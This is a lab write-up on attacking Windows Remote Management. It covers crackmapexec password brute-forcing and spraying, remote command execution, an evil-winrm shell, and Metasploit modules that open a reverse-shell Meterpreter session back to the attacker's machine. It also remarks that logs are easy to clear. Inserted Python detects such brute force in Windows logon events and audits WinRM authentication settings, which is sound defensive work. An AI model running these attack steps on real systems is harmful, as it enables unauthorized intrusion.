Exploiting WinRM
Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access to Windows systems over HTTP(S).
Microsoft implemented WinRM in Windows to make life easier for system administrators.
WinRM is typically used in the following ways:
- Remotely access and interact with Windows hosts on a local network.
- Remotely access and execute commands on Windows systems.
- Remotely manage and configure Windows systems.
- WinRM typically uses TCP ports 5985 and 5986 (HTTPS).
WinRM implements access control and security for communication between systems through various forms of authentication.
We can use a utility called "crackmapexec" to brute-force WinRM in order to identify users and their passwords, and then execute commands on the target system.
We can also use a Ruby script called "evil-winrm" to obtain a command shell session on the target system.
Demo: Exploiting WinRM
WinRM is a feature built into Windows; however, it is not configured to run by default and must be explicitly configured and enabled before it works and before you can use it.
Target IP Address: 10.2.18.45
nmap -sV 10.2.18.45
Don't pay too much attention to the banner or service version shown here: nmap does not get an explicit banner from Windows telling it that this is WinRM. We do know that WinRM is running on this port.
nmap -sV -p 5985 10.2.18.45
Brute Forcing & Password Spraying
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
WinRM Protocol Password spraying
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Why are we only targeting the administrator account? Let's take a few things into consideration:
Firstly, on Windows the administrator account is definitely there, because it is the first account created when Windows is installed.
Secondly, the administrator account is typically the account a system administrator uses to access the system, for obvious reasons.
Thirdly, if we gain access to the administrator account we already have elevated privileges, so we do not have to go through the process of elevating our privileges manually.
crackmapexec winrm 10.2.18.45 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
WINRM 10.2.18.45 5985 NONE [*] http://10.2.18.45:5985/wsman
It does connect to WinRM; don't be confused by the output referring to wsman or the wsman service, because WinRM is Microsoft's implementation of WS-Management (WS-Man).
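From the defender's side, the brute force and spray shown above appear as runs of failed network logons (Event ID 4625, logon type 3) from a single source, followed by a successful logon (4624) once a password hits. The following Python is an added example, not part of these notes or of crackmapexec: the event records it processes are constructed, and the window and thresholds are assumptions to tune per environment.

```python
"""Detect WinRM brute force and password spraying in Windows Security events.

Added example, not part of the original write-up or of crackmapexec. Assumes
Security events exported as JSON lines with the 4624/4625 fields shown below;
the records are constructed for the example. WinRM logons are network logons
(LogonType 3), so only those are considered.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import json

WINDOW = timedelta(minutes=10)   # sliding window per source address (assumed)
FAIL_THRESHOLD = 5               # failures against one account from one source
SPRAY_THRESHOLD = 3              # distinct accounts failing from one source

# Constructed sample: 10.10.16.4 hammers "administrator" and then succeeds,
# 10.10.22.9 tries one password across several accounts, 10.10.30.7 is a
# normal admin logon, and the last record is a console (type 2) failure.
SAMPLE_EVENTS = """\
{"EventID": 4625, "TimeCreated": "2022-09-17T18:30:01", "TargetUserName": "administrator", "IpAddress": "10.10.16.4", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:30:02", "TargetUserName": "administrator", "IpAddress": "10.10.16.4", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:30:03", "TargetUserName": "administrator", "IpAddress": "10.10.16.4", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:30:04", "TargetUserName": "administrator", "IpAddress": "10.10.16.4", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:30:05", "TargetUserName": "administrator", "IpAddress": "10.10.16.4", "LogonType": 3}
{"EventID": 4624, "TimeCreated": "2022-09-17T18:30:06", "TargetUserName": "administrator", "IpAddress": "10.10.16.4", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:31:10", "TargetUserName": "administrator", "IpAddress": "10.10.22.9", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:31:11", "TargetUserName": "demo", "IpAddress": "10.10.22.9", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:31:12", "TargetUserName": "sysadmin", "IpAddress": "10.10.22.9", "LogonType": 3}
{"EventID": 4624, "TimeCreated": "2022-09-17T18:35:00", "TargetUserName": "administrator", "IpAddress": "10.10.30.7", "LogonType": 3}
{"EventID": 4625, "TimeCreated": "2022-09-17T18:36:00", "TargetUserName": "auditor", "IpAddress": "-", "LogonType": 2}
"""


def parse_events(text):
    """Parse JSON-lines events and return them ordered by time."""
    events = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            rec["TimeCreated"] = datetime.fromisoformat(rec["TimeCreated"])
            events.append(rec)
    return sorted(events, key=lambda r: r["TimeCreated"])


def detect(events):
    """Return {source_ip: [alerts]} for sources that brute-force or spray
    WinRM, plus a note when such a source subsequently logs on."""
    failures = defaultdict(list)      # ip -> [(time, account)] inside WINDOW
    alerts = defaultdict(set)
    for ev in events:
        if ev.get("LogonType") != 3:
            continue                  # not a network logon, so not WinRM
        ip, now = ev["IpAddress"], ev["TimeCreated"]
        if ev["EventID"] == 4625:
            recent = [f for f in failures[ip] if now - f[0] <= WINDOW]
            recent.append((now, ev["TargetUserName"]))
            failures[ip] = recent
            per_account = defaultdict(int)
            for _, account in recent:
                per_account[account] += 1
            if max(per_account.values()) >= FAIL_THRESHOLD:
                alerts[ip].add("brute_force")
            if len(per_account) >= SPRAY_THRESHOLD:
                alerts[ip].add("password_spray")
        elif ev["EventID"] == 4624 and ip in alerts:
            # A success from an already-flagged source: the guess most likely
            # worked (crackmapexec's "Pwn3d!" seen from the defender's side).
            alerts[ip].add("success_after_failures:" + ev["TargetUserName"])
    return {ip: sorted(a) for ip, a in alerts.items()}


if __name__ == "__main__":
    for ip, found in detect(parse_events(SAMPLE_EVENTS)).items():
        print(ip, ", ".join(found))
```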
We can use crackmapexec to execute arbitrary Windows commands on the target.
Execute Command using WinRM
#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 ROGER [+] GOLD\user:password (Pwn3d!)
WINRM 192.168.255.131 5985 ROGER [+] Executed command
WINRM 192.168.255.131 5985 ROGER gold\user
crackmapexec winrm 10.2.18.45 -u administrator -p tinkerbell -x "whoami"
Enumerate information about this particular system:
crackmapexec winrm 10.2.18.45 -u administrator -p tinkerbell -x "systeminfo"
We have not used any exploit code or exploited a vulnerability within WinRM; we simply performed a brute-force attack and are now using the WinRM protocol to legitimately execute commands on the target system. Of course, executing commands on the target generates its own logs, which can be cleared easily, but this approach is relatively safe because if WinRM is enabled on the target, firewall rules or exceptions will already have been added, so you can communicate with the system via WinRM without restriction.
Obtain a command shell session:
We get a command shell facilitated through PowerShell.
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.2.18.45
PS C:\Users\Administrator\Documents> whoami
PS C:\Users\Administrator\Documents> ipconfig
PS C:\Users\Administrator\Documents> net user
WinRM Script Exec Remote Code Execution
This module uses valid credentials to log in to the WinRM service and execute a payload. It has two available payload delivery methods: PowerShell 2.0 and the VBS CmdStager. The module checks whether PowerShell 2.0 is available and, if so, uses that method. Otherwise it falls back to the less stealthy VBS CmdStager. IMPORTANT: if targeting an x64 system with the PowerShell method, you MUST select an x64 payload. An x86 payload will never return.
It is a 64-bit Meterpreter session because it migrated to a 64-bit process, and we then get the privileges associated with that process.
service postgresql start && msfconsole
search winrm_script
use exploit/windows/winrm/winrm_script_exec
show options
set RHOSTS 10.2.18.45
set FORCE_VBS true
set USERNAME administrator
set PASSWORD tinkerbell
exploit
meterpreter > sysinfo
meterpreter > getuid
WinRM: Exploitation with Metasploit
Overview
You are provided with a Kali GUI machine and a target machine running a WinRM server. The IP address of the target machine is provided in a text file named target on the Kali machine's desktop (/root/Desktop/target).
Your task is to fingerprint the WinRM service using the tools available on the Kali machine and then exploit it using the Metasploit Framework's exploit and auxiliary modules.
Objective: exploit the WinRM service to obtain a Meterpreter session on the target and retrieve the flag!
Instructions:
Your Kali machine has an interface with IP address 10.10.X.Y. Run "ip addr" to find out the values of X and Y.
The IP address of the target machine is given in the file "/root/Desktop/target".
Do not attack the gateways located at IP addresses 192.V.W.1 and 10.10.X.1.
Wordlists used:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
My own approach
Target IP Address : 10.3.27.236
root@attackdefense:~# nmap -sV 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:14 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.09 seconds
root@attackdefense:~# nmap -p- 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:16 IST
Nmap scan report for 10.3.27.236
Host is up (0.0026s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 334.69 seconds
root@attackdefense:~# nmap -sV -p 5985 10.3.27.236
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 18:25 IST
Nmap scan report for 10.3.27.236
Host is up (0.0030s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds
crackmapexec winrm 10.3.27.236 -u /usr/share/metasploit-framework/data/wordlists/common_users.txt -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
WINRM 10.3.27.236 5985 NONE [-] None\administrator:elizabeth "Failed to authenticate the user administrator with ntlm"
WINRM 10.3.27.236 5985 NONE [-] None\administrator:hottie "Failed to authenticate the user administrator with ntlm"
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WinRM protocol Command execution
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -X whoami
WINRM 10.3.27.236 5985 NONE [*] http://10.3.27.236:5985/wsman
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WINRM 10.3.27.236 5985 NONE [+] Executed command
WINRM 10.3.27.236 5985 NONE server\administrator
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x ipconfig
WINRM 10.3.27.236 5985 NONE [*] http://10.3.27.236:5985/wsman
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WINRM 10.3.27.236 5985 NONE [+] Executed command
WINRM 10.3.27.236 5985 NONE
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : us-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
IPv4 Address. . . . . . . . . . . : 10.3.27.236
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.3.16.1
root@attackdefense:~# crackmapexec winrm 10.3.27.236 -u administrator -p tinkerbell -x "systeminfo"
WINRM 10.3.27.236 5985 NONE [*] http://10.3.27.236:5985/wsman
WINRM 10.3.27.236 5985 NONE [+] None\administrator:tinkerbell (Pwn3d!)
WINRM 10.3.27.236 5985 NONE [+] Executed command
WINRM 10.3.27.236 5985 NONE
Host Name: SERVER
OS Name: Microsoft Windows Server 2019 Datacenter
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: EC2
Registered Organization: Amazon.com
Product ID: 00430-00000-00000-AA975
Original Install Date: 10/1/2020, 2:03:19 PM
System Boot Time: 9/17/2022, 12:42:08 PM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version: Xen 4.2.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,096 MB
Available Physical Memory: 3,188 MB
Virtual Memory: Max Size: 5,504 MB
Virtual Memory: Available: 4,731 MB
Virtual Memory: In Use: 773 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\SERVER
Hotfix(s): 20 Hotfix(s) Installed.
[01]: KB4570720
[02]: KB4470502
[03]: KB4470788
[04]: KB4480056
[05]: KB4493510
[06]: KB4494174
[07]: KB4499728
[08]: KB4504369
[09]: KB4512577
[10]: KB4512937
[11]: KB4521862
[12]: KB4523204
[13]: KB4539571
[14]: KB4549947
[15]: KB4558997
[16]: KB4561600
[17]: KB4562562
[18]: KB4566424
[19]: KB4570332
[20]: KB4570333
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.3.16.1
IP address(es)
[01]: 10.3.27.236
[02]: fe80::cda1:e4e1:4b3a:b51d
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
root@attackdefense:/opt/evil-winrm# ls
CHANGELOG.md CODE_OF_CONDUCT.md CONTRIBUTING.md Dockerfile Gemfile Gemfile.lock LICENSE README.md evil-winrm.rb resources
root@attackdefense:/opt/evil-winrm# evil-winrm.rb -i 10.3.27.236 -u administrator -p tinkerbell
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
server\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : us-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::cda1:e4e1:4b3a:b51d%4
IPv4 Address. . . . . . . . . . . : 10.3.27.236
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 10.3.16.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator auditor DefaultAccount
demo Guest sysadmin
WDAGUtilityAccount
The command completed with one or more errors.
WinRM Script Exec Remote Code Execution
WinRM Script Exec Remote Code Execution
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. The module will check if Powershell 2.0 is available, and if so uses that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.
Target IP Address : 10.0.28.36
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search winrm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_auth_methods normal No WinRM Authentication Method Detection
1 auxiliary/scanner/winrm/winrm_cmd normal No WinRM Command Runner
2 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
3 auxiliary/scanner/winrm/winrm_wql normal No WinRM WQL Query Runner
4 exploit/windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution
Interact with a module by name or index, for example use 4 or use exploit/windows/winrm/winrm_script_exec
msf5 > use exploit/windows/winrm/winrm_script_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/winrm/winrm_script_exec) > show options
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes A specific username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf5 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf5 exploit(windows/winrm/winrm_script_exec) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 exploit(windows/winrm/winrm_script_exec) > set USERNAME administrator
USERNAME => administrator
msf5 exploit(windows/winrm/winrm_script_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
[*] Sending stage (176195 bytes) to 10.0.28.36
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.0.28.36:49751) at 2022-09-17 19:41:07 +0530
[*] Session ID 1 (10.10.16.4:4444 -> 10.0.28.36:49751) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is katzx.exe (3612) as: SERVER\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (896)
[+] Successfully migrated to svchost.exe (896) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
meterpreter > sysinfo
Computer : SERVER
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat c:\\flag.txt
3c716f95616eec677a7078f92657a230
Solution
The solution to this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-2026.pdf
WinRM Authentication Method Detection
WinRM Script Exec Remote Code Execution
Reference solution
root@attackdefense:~# nmap --top-port 7000 10.0.28.36
Starting Nmap 7.70 ( https://nmap.org ) at 2022-09-17 20:00 IST
Nmap scan report for 10.0.28.36
Host is up (0.0030s latency).
Not shown: 6995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 36.48 seconds
WinRM Login Utility
This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate (NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the "AllowUnencrypted" winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > use auxiliary/scanner/winrm/winrm_login
msf5 auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.0.28.36
RHOSTS => 10.0.28.36
msf5 auxiliary(scanner/winrm/winrm_login) > run
[+] 10.0.28.36:5985 - Login Successful: WORKSTATION\administrator:tinkerbell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/winrm/winrm_login) >
WinRM Authentication Method Detection
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the supported authentication methods.
Target IP Address : 10.0.20.140
msf5 > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > show options
Module options (auxiliary/scanner/winrm/winrm_auth_methods):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 10.0.20.140
RHOSTS => 10.0.20.140
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run
[+] 10.0.20.140:5985: Negotiate protocol supported
[+] 10.0.20.140:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
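The auth-method check above is just as useful to defenders: auditing which schemes a listener advertises is how you find hosts where Basic is on (and, as the login-module note says, where AllowUnencrypted may be set). The following Python is an added example, not the Metasploit module's code: it parses a constructed 401 response rather than contacting a host, and the Server header value and realm are assumptions about what HTTP.sys returns.

```python
"""Audit the authentication methods a WinRM listener advertises.

Added example, not part of the original write-up and not the Metasploit
module's code. It does offline what auxiliary/scanner/winrm/winrm_auth_methods
does on the wire: an unauthenticated POST to /wsman is answered with a 401
whose WWW-Authenticate headers list the accepted schemes. Both responses below
are constructed; the Server value and realm are assumptions about HTTP.sys.
"""

# Constructed 401 such as a plain-HTTP WinRM listener on 5985 returns for /wsman.
SAMPLE_WINRM_401 = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-HTTPAPI/2.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "WWW-Authenticate: Basic realm=\"WSMAN\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed reply from some other HTTP.sys-hosted service: nmap labels both
# "Microsoft HTTPAPI httpd 2.0", which is why the banner alone proves nothing.
SAMPLE_OTHER_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Microsoft-HTTPAPI/2.0\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_response(raw):
    """Split a raw HTTP response into (status, headers). Header names are
    lower-cased and map to a list, because WWW-Authenticate may repeat."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def auth_schemes(headers):
    """Collect the offered schemes. One WWW-Authenticate value may carry several
    comma-separated challenges; the scheme is each challenge's first token
    (realm strings that themselves contain commas are not handled here)."""
    schemes = set()
    for value in headers.get("www-authenticate", []):
        for challenge in value.split(","):
            if challenge.strip():
                schemes.add(challenge.split()[0])
    return schemes


def audit(raw, tls=False):
    """Classify the response to an unauthenticated /wsman request and report
    weak settings; tls says whether the listener was reached over HTTPS."""
    status, headers = parse_response(raw)
    server = headers.get("server", [""])[0]
    schemes = auth_schemes(headers)
    # HTTP.sys fronts many services; the discriminator is a 401 challenge on
    # /wsman with a scheme WinRM speaks, not the Server header by itself.
    looks_like_winrm = (status == 401 and server.startswith("Microsoft-HTTPAPI/")
                        and bool(schemes & {"Negotiate", "Basic"}))
    findings = []
    if looks_like_winrm and "Basic" in schemes:
        msg = "Basic auth enabled"
        if not tls:
            msg += (": on a plain-HTTP listener with AllowUnencrypted set, the "
                    "password crosses the wire base64-encoded only")
        findings.append(msg)
    return {"looks_like_winrm": looks_like_winrm,
            "schemes": sorted(schemes),
            "findings": findings}
```

Where Basic turns up on a listener you own, it can be switched off with `Set-Item WSMan:\localhost\Service\Auth\Basic -Value $false`, leaving Negotiate as the accepted scheme.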
WinRM Command Runner
This module runs arbitrary Windows commands using the WinRM service.
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > show options
Module options (auxiliary/scanner/winrm/winrm_cmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ipconfig /all yes The windows command to run
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME yes The username to authenticate as
VHOST no HTTP server virtual host
